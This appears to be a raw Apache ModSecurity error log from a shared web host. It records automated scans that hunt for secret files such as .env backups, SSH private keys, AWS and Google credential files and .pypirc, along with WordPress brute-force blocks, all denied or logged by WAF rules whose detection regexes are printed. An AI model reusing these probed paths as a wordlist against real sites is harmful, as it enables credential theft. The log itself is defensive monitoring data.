[Tue May 26 15:40:20.464720 2026] [security2:error] [pid 733610:tid 733851] [client 142.248.80.222:61772] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpcontacts.aastha-enterprises.com"] [uri "/___proxy_subdomain_cpcontacts/.env.production.bak"] [unique_id "ahVxjMLL_4PasUNKBsfO7AAAAG8"]
[Tue May 26 15:40:20.464869 2026] [security2:error] [pid 733610:tid 733761] [client 142.248.80.222:61712] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpcontacts.aastha-enterprises.com"] [uri "/___proxy_subdomain_cpcontacts/.env.local.backup"] [unique_id "ahVxjMLL_4PasUNKBsfO6QAAABU"]
[Tue May 26 15:40:20.464918 2026] [security2:error] [pid 733610:tid 733784] [client 142.248.80.222:61742] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "cpcontacts.aastha-enterprises.com"] [uri "/___proxy_subdomain_cpcontacts/.env.local.swp"] [unique_id "ahVxjMLL_4PasUNKBsfO6gAAACw"]
[Tue May 26 15:40:20.465883 2026] [security2:error] [pid 733610:tid 733830] [client 142.248.80.222:61708] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpcontacts.aastha-enterprises.com"] [uri "/___proxy_subdomain_cpcontacts/.env.local.bak"] [unique_id "ahVxjMLL_4PasUNKBsfO6wAAAFo"]
[Tue May 26 15:40:20.481791 2026] [security2:error] [pid 733610:tid 733759] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxjMLL_4PasUNKBsfO2gAAABM"]
[Tue May 26 15:40:20.845672 2026] [security2:error] [pid 733610:tid 733824] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxjMLL_4PasUNKBsfO9QAAAFQ"]
[Tue May 26 15:40:21.362140 2026] [security2:error] [pid 733610:tid 733798] [client 195.178.110.34:42572] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.d2cargo.com"] [uri "/___proxy_subdomain_cpanel/env/.env"] [unique_id "ahVxjcLL_4PasUNKBsfPBgAAADo"]
[Tue May 26 15:40:21.647600 2026] [security2:error] [pid 733610:tid 733825] [client 5.255.126.59:55344] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:id_(?:r|d)sa$|key\\\\.pem$|(?:myserver|private-?key)\\\\.key$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1291"] [id "350591"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw Private cryto keys"] [severity "CRITICAL"] [hostname "bloggertarget.com"] [uri "/.ssh/id_dsa"] [unique_id "ahVxjcLL_4PasUNKBsfPEwAAAFU"]
[Tue May 26 15:40:21.653307 2026] [security2:error] [pid 733610:tid 733864] [client 5.255.126.59:55236] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "bloggertarget.com"] [uri "/.env.old"] [unique_id "ahVxjcLL_4PasUNKBsfPFgAAAHw"]
[Tue May 26 15:40:21.688140 2026] [security2:error] [pid 733610:tid 733846] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxjcLL_4PasUNKBsfPDAAAAGo"]
[Tue May 26 15:40:21.691491 2026] [security2:error] [pid 733610:tid 733850] [client 5.255.126.59:55478] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bloggertarget.com"] [uri "/api/.env"] [unique_id "ahVxjcLL_4PasUNKBsfPGwAAAG4"]
[Tue May 26 15:40:21.697255 2026] [security2:error] [pid 733610:tid 733821] [client 5.255.126.59:55304] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bloggertarget.com"] [uri "/app/.env"] [unique_id "ahVxjcLL_4PasUNKBsfPIQAAAFE"]
[Tue May 26 15:40:21.706090 2026] [security2:error] [pid 733610:tid 733834] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxjcLL_4PasUNKBsfPCQAAAF4"], referer: https://bloggertarget.com/vault.env
[Tue May 26 15:40:21.791903 2026] [security2:error] [pid 733610:tid 733818] [client 5.255.126.59:55220] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "bloggertarget.com"] [uri "/.env.backup"] [unique_id "ahVxjcLL_4PasUNKBsfPNAAAAE4"]
[Tue May 26 15:40:21.811943 2026] [security2:error] [pid 733610:tid 733807] [client 5.255.126.59:55386] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxjcLL_4PasUNKBsfPFwAAAEM"]
[Tue May 26 15:40:21.837482 2026] [security2:error] [pid 733610:tid 733858] [client 5.255.126.59:55396] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxjcLL_4PasUNKBsfPHAAAAHY"]
[Tue May 26 15:40:21.839829 2026] [security2:error] [pid 733610:tid 733754] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxjcLL_4PasUNKBsfPGgAAAA4"]
[Tue May 26 15:40:21.844508 2026] [security2:error] [pid 733610:tid 733752] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxjcLL_4PasUNKBsfPJwAAAAw"]
[Tue May 26 15:40:21.860557 2026] [security2:error] [pid 733610:tid 733822] [client 5.255.126.59:55350] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxjcLL_4PasUNKBsfPGQAAAFI"]
[Tue May 26 15:40:22.024611 2026] [security2:error] [pid 733610:tid 733740] [client 5.255.126.59:55304] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bloggertarget.com"] [uri "/.env"] [unique_id "ahVxjsLL_4PasUNKBsfPSAAAAAA"]
[Tue May 26 15:40:22.269274 2026] [security2:error] [pid 733610:tid 733854] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxjcLL_4PasUNKBsfPMwAAAHI"]
[Tue May 26 15:40:22.287284 2026] [security2:error] [pid 733610:tid 733768] [client 5.255.126.59:55402] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxjcLL_4PasUNKBsfPFQAAABw"]
[Tue May 26 15:40:22.294597 2026] [security2:error] [pid 733610:tid 733755] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxjcLL_4PasUNKBsfPLQAAAA8"]
[Tue May 26 15:40:22.304586 2026] [security2:error] [pid 733610:tid 733780] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxjcLL_4PasUNKBsfPKgAAACg"]
[Tue May 26 15:40:22.307296 2026] [security2:error] [pid 733610:tid 733803] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxjcLL_4PasUNKBsfPJgAAAD8"]
[Tue May 26 15:40:22.314449 2026] [security2:error] [pid 733610:tid 733741] [client 5.255.126.59:55404] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxjcLL_4PasUNKBsfPKwAAAAE"]
[Tue May 26 15:40:22.328473 2026] [security2:error] [pid 733610:tid 733795] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxjcLL_4PasUNKBsfPLAAAADc"]
[Tue May 26 15:40:22.345747 2026] [security2:error] [pid 733610:tid 733772] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxjcLL_4PasUNKBsfPMAAAACA"]
[Tue May 26 15:40:22.382818 2026] [security2:error] [pid 733610:tid 733765] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxjcLL_4PasUNKBsfPOgAAABk"]
[Tue May 26 15:40:22.403823 2026] [security2:error] [pid 733610:tid 733848] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxjcLL_4PasUNKBsfPRQAAAGw"]
[Tue May 26 15:40:22.405052 2026] [security2:error] [pid 733610:tid 733771] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxjcLL_4PasUNKBsfPOQAAAB8"]
[Tue May 26 15:40:22.415560 2026] [security2:error] [pid 733610:tid 733807] [client 5.255.126.59:55210] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "bloggertarget.com"] [uri "/.env.bak"] [unique_id "ahVxjsLL_4PasUNKBsfPYAAAAEM"]
[Tue May 26 15:40:22.418255 2026] [security2:error] [pid 733610:tid 733806] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxjcLL_4PasUNKBsfPQAAAAEI"]
[Tue May 26 15:40:22.442326 2026] [security2:error] [pid 733610:tid 733763] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxjsLL_4PasUNKBsfPWAAAABc"]
[Tue May 26 15:40:22.446087 2026] [security2:error] [pid 733610:tid 733750] [client 5.255.126.59:55478] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxjcLL_4PasUNKBsfPQgAAAAo"]
[Tue May 26 15:40:22.449029 2026] [security2:error] [pid 733610:tid 733816] [client 5.255.126.59:38254] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxjsLL_4PasUNKBsfPTQAAAEw"], referer: https://bloggertarget.com/gcp-credentials.json
[Tue May 26 15:40:22.452298 2026] [security2:error] [pid 733610:tid 733775] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxjsLL_4PasUNKBsfPWQAAACM"]
[Tue May 26 15:40:22.453990 2026] [security2:error] [pid 733610:tid 733748] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxjsLL_4PasUNKBsfPUwAAAAg"]
[Tue May 26 15:40:22.461983 2026] [security2:error] [pid 733610:tid 733860] [client 5.255.126.59:55236] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxjcLL_4PasUNKBsfPQQAAAHg"]
[Tue May 26 15:40:22.467109 2026] [security2:error] [pid 733610:tid 733793] [client 5.255.126.59:55226] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bloggertarget.com"] [uri "/backend/.env"] [unique_id "ahVxjsLL_4PasUNKBsfPagAAADU"]
[Tue May 26 15:40:22.472570 2026] [security2:error] [pid 733610:tid 733861] [client 5.255.126.59:55304] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bloggertarget.com"] [uri "/public/.env"] [unique_id "ahVxjsLL_4PasUNKBsfPbwAAAHk"]
[Tue May 26 15:40:22.476807 2026] [security2:error] [pid 733610:tid 733825] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxjsLL_4PasUNKBsfPXwAAAFU"]
[Tue May 26 15:40:22.479182 2026] [security2:error] [pid 733610:tid 733851] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxjsLL_4PasUNKBsfPXAAAAG8"]
[Tue May 26 15:40:22.544998 2026] [proxy:error] [pid 733610:tid 733855] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:40:22.545079 2026] [proxy_http:error] [pid 733610:tid 733855] [client 142.248.80.222:61700] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:40:22.545685 2026] [proxy:error] [pid 733610:tid 733855] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:40:22.545714 2026] [proxy_http:error] [pid 733610:tid 733855] [client 142.248.80.222:61700] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:40:22.625315 2026] [security2:error] [pid 733610:tid 733666] [remote 47.251.53.97:33890] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.53.251.47.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "veganfoodindia.com"] [uri "/wp-login.php"] [unique_id "ahVxjsLL_4PasUNKBsfPZAAAfzc"]
[Tue May 26 15:40:22.632197 2026] [security2:error] [pid 733610:tid 733815] [client 5.255.126.59:55102] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:id_(?:r|d)sa$|key\\\\.pem$|(?:myserver|private-?key)\\\\.key$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1291"] [id "350591"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw Private cryto keys"] [severity "CRITICAL"] [hostname "bloggertarget.com"] [uri "/.ssh/id_rsa"] [unique_id "ahVxjsLL_4PasUNKBsfPeAAAAEs"]
[Tue May 26 15:40:23.341460 2026] [security2:error] [pid 733610:tid 733759] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxjsLL_4PasUNKBsfPbQAAABM"]
[Tue May 26 15:40:23.352569 2026] [security2:error] [pid 733610:tid 733757] [client 5.255.126.59:55430] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxjsLL_4PasUNKBsfPaQAAABE"]
[Tue May 26 15:40:23.370835 2026] [security2:error] [pid 733610:tid 733753] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxjsLL_4PasUNKBsfPbAAAAA0"]
[Tue May 26 15:40:23.414229 2026] [security2:error] [pid 733610:tid 733811] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxj8LL_4PasUNKBsfPjQAAAEc"]
[Tue May 26 15:40:23.423203 2026] [security2:error] [pid 733610:tid 733742] [client 5.255.126.59:55404] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxjsLL_4PasUNKBsfPeQAAAAI"]
[Tue May 26 15:40:23.423581 2026] [security2:error] [pid 733610:tid 733850] [client 5.255.126.59:55420] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxjsLL_4PasUNKBsfPgwAAAG4"]
[Tue May 26 15:40:23.432900 2026] [security2:error] [pid 733610:tid 733854] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxjsLL_4PasUNKBsfPfAAAAHI"]
[Tue May 26 15:40:23.441134 2026] [security2:error] [pid 733610:tid 733864] [client 5.255.126.59:55128] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxjsLL_4PasUNKBsfPfQAAAHw"]
[Tue May 26 15:40:23.463295 2026] [security2:error] [pid 733610:tid 733838] [client 5.255.126.59:38254] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxjsLL_4PasUNKBsfPhgAAAGI"], referer: https://bloggertarget.com/google-credentials.json
[Tue May 26 15:40:23.464989 2026] [security2:error] [pid 733610:tid 733786] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxj8LL_4PasUNKBsfPjgAAAC4"], referer: https://bloggertarget.com/.pypirc
[Tue May 26 15:40:23.479434 2026] [security2:error] [pid 733610:tid 733792] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxjsLL_4PasUNKBsfPhQAAADQ"], referer: https://bloggertarget.com/.aws/credentials
[Tue May 26 15:40:24.092772 2026] [security2:error] [pid 733610:tid 733798] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxj8LL_4PasUNKBsfPpAAAADo"], referer: https://bloggertarget.com/.env.production
[Tue May 26 15:40:24.127685 2026] [security2:error] [pid 733610:tid 733785] [client 223.123.38.127:15219] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 127.38.123.223.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVxj8LL_4PasUNKBsfPoQAAAC0"]
[Tue May 26 15:40:24.127793 2026] [security2:error] [pid 733610:tid 733785] [client 223.123.38.127:15219] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVxj8LL_4PasUNKBsfPoQAAAC0"]
[Tue May 26 15:40:24.285850 2026] [security2:error] [pid 733610:tid 733867] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxj8LL_4PasUNKBsfPqQAAAH8"], referer: https://bloggertarget.com/application.properties
